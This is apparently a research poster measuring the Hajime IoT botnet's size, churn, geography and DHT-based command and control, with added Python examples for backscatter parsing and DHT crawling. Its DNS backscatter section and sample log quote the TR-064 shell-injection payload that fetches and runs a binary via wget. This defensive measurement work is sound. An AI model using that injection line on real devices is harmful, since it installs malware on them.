Measurement and Analysis of Hajime, a Peer-to-Peer IoT Botnet · 2019-03-04
Post on 26-Jul-2020
[Figure: Number of distinct bots over time (20-minute bins), 01-26 to 06-01; annotated with the atk.mipseb update and the update.i.mipseb update]
[Figure: Number of distinct bots over time (20-minute bins), 01-26 to 06-01, broken down by country: Brazil, Iran, Mexico, China, S. India, S. Korea, US, Turkey, Russia, Indonesia, Others; annotated with the atk.mipseb update and the update.i.mipseb update]
[Figure: Number of distinct bots per country (BR, CN, IR, IN, KR, US, TR, RU, MX, IT), broken down by architecture: arm5, arm6, arm7, mipsel, mipseb, unknown; y-axis ticks 0K to 600K, plus 4M and 5M marks]
[Figure: Number of distinct bots per country (BR, IR, MX, CN, IN, KR, US, TR, RU, ID), broken down by architecture: arm5, arm6, arm7, mipsel, mipseb, unknown; same axes]
[Figure: TR-064 injection attempts over time (20-minute bins), 11/16 to 05/18, Hajime vs. Mirai; annotated with the config update, the update.i.mipseb update, the atk.mipseb update, the update.i.mipsel update and the atk.mipsel update]
Measurement and Analysis of Hajime, a Peer-to-Peer IoT Botnet
Stephen Herwig (smherwig@cs.umd.edu), Katura Harvey (katura@cs.umd.edu), George Hughey (ghughey@terpmail.umd.edu), Richard Roberts (ricro@cs.umd.edu), Dave Levin (dml@cs.umd.edu)
Hajime: Mirai successor; runs on many architectures; regular updates, new exploits; command and control over the BitTorrent DHT.

Goals: to inform defenses and intervention, characterize Hajime's steady-state behavior and understand the effect of new exploits on the botnet.

Datasets: DHT scans; uTP scans (10.5M keys); binary reverse engineering (52 payloads); DNS backscatter (125M queries).

Exploits: Chimay-Red; GPON shell injection; TR-064 shell injection.

Measured: botnet size, location, devices.

DNS backscatter (diagram): Bot IP = 1.2.3.4 → shell injection → Intended Victim (non-vulnerable) → DNS lookup → D-root. The injected shell command, with the attacking bot's own address as the download host:
NTPServer=`cd /tmp;wget http://1.2.3.4:5678/X;chmod 777 X; ./X`
Churn
[Figure: Number of births and deaths over time (20-minute bins), 01-26 to 06-01; annotated with the atk.mipseb update and the update.i.mipseb update]
Steady-state churn: 2K. Median bot lifetime: 5 hours.
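One way to derive births, deaths and bot lifetimes from per-bin presence data, added here as an illustration rather than the poster's own method: a bot is born in the first bin it appears in after being absent, dies in the first bin it is missing from, and a reappearance (for example after a reboot or reinfection) starts a new lifetime. The observation sets and key names are constructed, and treating bots still present in the last bin as right-censored (counting the span observed so far) is an assumption of this example, not something the poster states.

```python
from statistics import median

# Constructed presence data (hypothetical, not the poster's measurements): one set per
# 20-minute bin holding the long-lived per-bot keys observed in that bin.
OBSERVATIONS = [
    {"k1", "k2", "k3"},
    {"k1", "k2"},        # k3 absent: death
    {"k1", "k2", "k4"},  # k4 first seen: birth
    {"k1", "k4"},        # k2 absent: death
    {"k1", "k4", "k3"},  # k3 back (reboot/reinfection): counted as a new birth
    {"k1", "k3"},        # k4 absent: death
]
BIN_MINUTES = 20

def births_and_deaths(observations):
    """Per bin, (births, deaths): keys absent from the previous bin but present now,
    and keys present in the previous bin but absent now."""
    prev, out = set(), []
    for seen in observations:
        out.append((len(seen - prev), len(prev - seen)))
        prev = seen
    return out

def lifetimes(observations, bin_minutes=BIN_MINUTES):
    """Minutes each bot stayed continuously present. A gap ends a lifetime and a
    reappearance starts a new one; bots still present in the last bin are
    right-censored and contribute the span observed so far (an assumption here)."""
    runs, active = [], {}          # active: key -> bin index of its current birth
    for i, seen in enumerate(observations):
        for key in seen:
            active.setdefault(key, i)
        for key in list(active):
            if key not in seen:
                runs.append((i - active.pop(key)) * bin_minutes)
    runs.extend((len(observations) - start) * bin_minutes for start in active.values())
    return runs

def median_lifetime(observations, bin_minutes=BIN_MINUTES):
    return median(lifetimes(observations, bin_minutes))

def steady_state_churn(observations):
    """Median per-bin churn (births + deaths): one way to summarize the figure the
    poster reports as a steady-state churn of 2K."""
    return median(b + d for b, d in births_and_deaths(observations))

if __name__ == "__main__":
    print(births_and_deaths(OBSERVATIONS))
    print("median lifetime (min):", median_lifetime(OBSERVATIONS))
    print("steady-state churn per bin:", steady_state_churn(OBSERVATIONS))
```

The per-bot key is what makes this tracking possible: keyed on IP address alone, a bot whose address changes at reboot would be counted as a death and an unrelated birth, inflating churn.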
Exploit Effects
Chimay-Red increases the proportion of MikroTik bots from 0.79% to 80.29%; Russia goes from 500 active bots per hour to 6K following Chimay-Red.
The GPON exploit disproportionately affects Mexico and changes Mexico from primarily ARM to MIPS.
Botnet size: steady state of ~40K bots.
Location: 52.5% of bots are in Brazil.
Devices: overwhelmingly MIPS; 74.2% of bot devices are MIPS big endian.
Evolution of TR-064 Exploit (timeline annotations: Mirai deployment, Hajime testing, Hajime deployment)
Non-vulnerable hosts interpret the injected value as a hostname with an unfamiliar TLD (./X`). The DNS lookup this triggers reaches D-root, which therefore reveals the attacking bots' IP addresses: the wget host embedded in the payload is the bot itself.
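The backscatter idea above in code, as an added example that is not part of the poster or the authors' tooling: a parser that recovers attacking-bot addresses from query names as a root server would see them and counts distinct bots per 20-minute bin. The log format ("timestamp client qname"), the sample lines and the 1.2.3.4/5.6.7.8/999.1.2.3 addresses are constructed for illustration; the regular expression matches the wget pattern of the payload shown on the poster, and the last-label check is the "unfamiliar TLD" heuristic the poster describes.

```python
import re
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of root-server query-log lines (hypothetical "timestamp client qname"
# format; not real D-root data). A host that did not execute the injected value resolves it
# verbatim as a hostname, so the bot's own IP and port ride along inside the QNAME.
SAMPLE_LOG = """\
2018-03-09T10:01:12Z 203.0.113.7 `cd /tmp;wget http://1.2.3.4:5678/X;chmod 777 X; ./X`
2018-03-09T10:05:40Z 198.51.100.9 `cd /tmp;wget http://5.6.7.8:5678/X;chmod 777 X; ./X`
2018-03-09T10:18:03Z 203.0.113.7 `cd /tmp;wget http://1.2.3.4:5678/X;chmod 777 X; ./X`
2018-03-09T10:25:55Z 192.0.2.44 www.example.com
2018-03-09T10:41:10Z 192.0.2.45 `cd /tmp;wget http://999.1.2.3:5678/X;chmod 777 X; ./X`
"""

# The download target inside the injected value: wget http://<bot ip>:<port>/<file>;
WGET_RE = re.compile(r"wget\s+http://(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})/(\S+?)\s*;")
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(.*)$")

def unfamiliar_tld(qname):
    """True when the rightmost DNS label cannot be a real TLD, e.g. "/X`" from "... ./X`"."""
    tld = qname.rsplit(".", 1)[-1]
    return not re.fullmatch(r"[A-Za-z0-9-]+", tld)

def parse_payload(qname):
    """Recover (bot_ip, port, filename) from a backscattered injection string, or None."""
    if not unfamiliar_tld(qname):
        return None
    m = WGET_RE.search(qname)
    if not m:
        return None
    ip, port, filename = m.group(1), int(m.group(2)), m.group(3)
    try:
        ipaddress.IPv4Address(ip)      # rejects octets above 255 such as 999.1.2.3
    except ipaddress.AddressValueError:
        return None
    if not 0 < port <= 65535:
        return None
    return ip, port, filename

def bin_start(ts, minutes=20):
    """Floor an ISO-8601 UTC timestamp to the start of its bin (20 minutes, as on the poster)."""
    t = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    floored = t - timedelta(minutes=t.minute % minutes, seconds=t.second)
    return floored.strftime("%Y-%m-%dT%H:%M:%SZ")

def distinct_bots_per_bin(log_text, minutes=20):
    """Map each bin start to the set of attacking-bot IPs seen in backscatter during it."""
    bins = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, _client, qname = m.groups()
        parsed = parse_payload(qname)
        if parsed:
            bins[bin_start(ts, minutes)].add(parsed[0])
    return dict(bins)

if __name__ == "__main__":
    for b, bots in sorted(distinct_bots_per_bin(SAMPLE_LOG).items()):
        print(b, len(bots), sorted(bots))
```

Note that the client address in the log is the non-vulnerable victim's resolver, not the bot; only the wget host inside the name identifies the attacker, which is why the parser ignores the client column.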
Hajime uses BitTorrent's DHT for Command-and-Control
1. Announce: "I have <file>"
2. Get: "Who has <file>?"
3. Repeated Gets construct the entire set of bots with a given file.
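The three-step exchange above in code, added here as an illustration (not Hajime's implementation and not the authors' crawler): a minimal bencode codec, the KRPC announce_peer ("I have") and get_peers ("Who has?") messages of the BitTorrent DHT, and the union of repeated get_peers replies into the full set of peers announced under one key. The info-hash, node ids, tokens and the peers in the constructed replies are made up; a real crawl would send these over UDP and keep following the returned "nodes" toward the key, which this offline example only parses.

```python
import socket
import struct

# ---- minimal bencode (BEP 3), the encoding of KRPC DHT messages ----
def bencode(obj):
    if isinstance(obj, int):
        return b"i%de" % obj
    if isinstance(obj, str):
        obj = obj.encode()
    if isinstance(obj, bytes):
        return b"%d:%s" % (len(obj), obj)
    if isinstance(obj, list):
        return b"l" + b"".join(bencode(x) for x in obj) + b"e"
    if isinstance(obj, dict):
        items = sorted((k.encode() if isinstance(k, str) else k, v) for k, v in obj.items())
        return b"d" + b"".join(bencode(k) + bencode(v) for k, v in items) + b"e"
    raise TypeError("cannot bencode %r" % type(obj))

def _decode(data, i):
    c = data[i:i + 1]
    if c == b"i":                      # integer: i<digits>e
        end = data.index(b"e", i)
        return int(data[i + 1:end]), end + 1
    if c == b"l":                      # list: l<items>e
        out, i = [], i + 1
        while data[i:i + 1] != b"e":
            v, i = _decode(data, i)
            out.append(v)
        return out, i + 1
    if c == b"d":                      # dict: d<key><value>...e, keys are byte strings
        out, i = {}, i + 1
        while data[i:i + 1] != b"e":
            k, i = _decode(data, i)
            v, i = _decode(data, i)
            out[k] = v
        return out, i + 1
    if c.isdigit():                    # byte string: <len>:<bytes>
        colon = data.index(b":", i)
        n, start = int(data[i:colon]), colon + 1
        return data[start:start + n], start + n
    raise ValueError("malformed bencode at offset %d" % i)

def bdecode(data):
    value, end = _decode(data, 0)
    if end != len(data):
        raise ValueError("trailing bytes after bencoded value")
    return value

# ---- KRPC messages (BEP 5) for one key (info-hash) ----
def build_announce_peer(tid, node_id, info_hash, port, token):
    """Step 1, "I have <file>": a bot announces itself under the key."""
    return bencode({"t": tid, "y": "q", "q": "announce_peer",
                    "a": {"id": node_id, "info_hash": info_hash, "port": port, "token": token}})

def build_get_peers(tid, node_id, info_hash):
    """Step 2, "Who has <file>?": ask a DHT node for peers announced under the key."""
    return bencode({"t": tid, "y": "q", "q": "get_peers",
                    "a": {"id": node_id, "info_hash": info_hash}})

def build_get_peers_response(tid, node_id, token, peers=(), nodes=()):
    """A node's reply: "values" (compact peers it knows) and/or "nodes" (closer nodes to ask)."""
    r = {"id": node_id, "token": token}
    if peers:
        r["values"] = [socket.inet_aton(ip) + struct.pack("!H", port) for ip, port in peers]
    if nodes:
        r["nodes"] = b"".join(nid + socket.inet_aton(ip) + struct.pack("!H", port)
                              for nid, ip, port in nodes)
    return bencode({"t": tid, "y": "r", "r": r})

def parse_get_peers_response(raw):
    """Return (peers, nodes): compact peers are 4-byte IP + 2-byte port, nodes add a 20-byte id."""
    msg = bdecode(raw)
    if msg.get(b"y") != b"r":
        raise ValueError("not a KRPC response")
    r = msg[b"r"]
    peers = {(socket.inet_ntoa(v[:4]), struct.unpack("!H", v[4:6])[0])
             for v in r.get(b"values", [])}
    blob = r.get(b"nodes", b"")
    nodes = [(blob[i:i + 20], socket.inet_ntoa(blob[i + 20:i + 24]),
              struct.unpack("!H", blob[i + 24:i + 26])[0]) for i in range(0, len(blob), 26)]
    return peers, nodes

def collect_bots(responses):
    """Step 3: union the peer lists from repeated Gets into the full set of bots holding the key."""
    bots = set()
    for raw in responses:
        peers, _nodes = parse_get_peers_response(raw)
        bots |= peers
    return bots

# Constructed data (hypothetical key, node ids, tokens and peers; not observed Hajime values).
INFO_HASH = bytes.fromhex("11" * 20)
MY_ID, NODE_A, NODE_B, NODE_C = (bytes.fromhex(h * 20) for h in ("aa", "b1", "b2", "b3"))
SAMPLE_RESPONSES = [
    build_get_peers_response(b"q1", NODE_A, b"tokA",
                             peers=[("10.0.0.1", 6881), ("10.0.0.2", 6881)],
                             nodes=[(NODE_C, "10.0.0.9", 6881)]),
    build_get_peers_response(b"q2", NODE_B, b"tokB",
                             peers=[("10.0.0.2", 6881), ("10.0.0.3", 7000)]),
]

if __name__ == "__main__":
    print(build_get_peers(b"q1", MY_ID, INFO_HASH))
    print(sorted(collect_bots(SAMPLE_RESPONSES)))
```

Each DHT node only returns the announcements it has stored, so a single get_peers reply is a partial view; enumerating the botnet means querying every node near the key and unioning the results, which is exactly what makes the DHT-based design measurable from outside.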
Botnet size: peaks of 95K after the Chimay-Red and GPON exploits.
IoT Botnets Pose a Major Threat
Mirai: largest DoS attacks in history. ⇒ We are longitudinally measuring Hajime.
Churn: reboots and reinfections are common.
Location: the geographic makeup of IoT botnets can change rapidly.
uTP sessions: uTP handshakes yield per-bot long-lived keys.